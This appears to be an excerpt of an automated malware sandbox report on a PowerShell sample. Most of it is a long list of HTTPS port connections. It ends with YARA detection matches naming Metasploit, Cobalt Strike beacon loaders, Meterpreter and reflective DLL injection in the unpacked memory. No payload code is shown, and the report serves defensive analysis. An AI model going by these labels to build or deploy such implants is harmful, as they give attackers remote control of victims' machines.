                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50246
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922

                    System Summary

                    barindex
                    Source: oEFrY6Xcyl.ps1, type: SAMPLEMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
                    Source: amsi64_2820.amsi.csv, type: OTHERMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
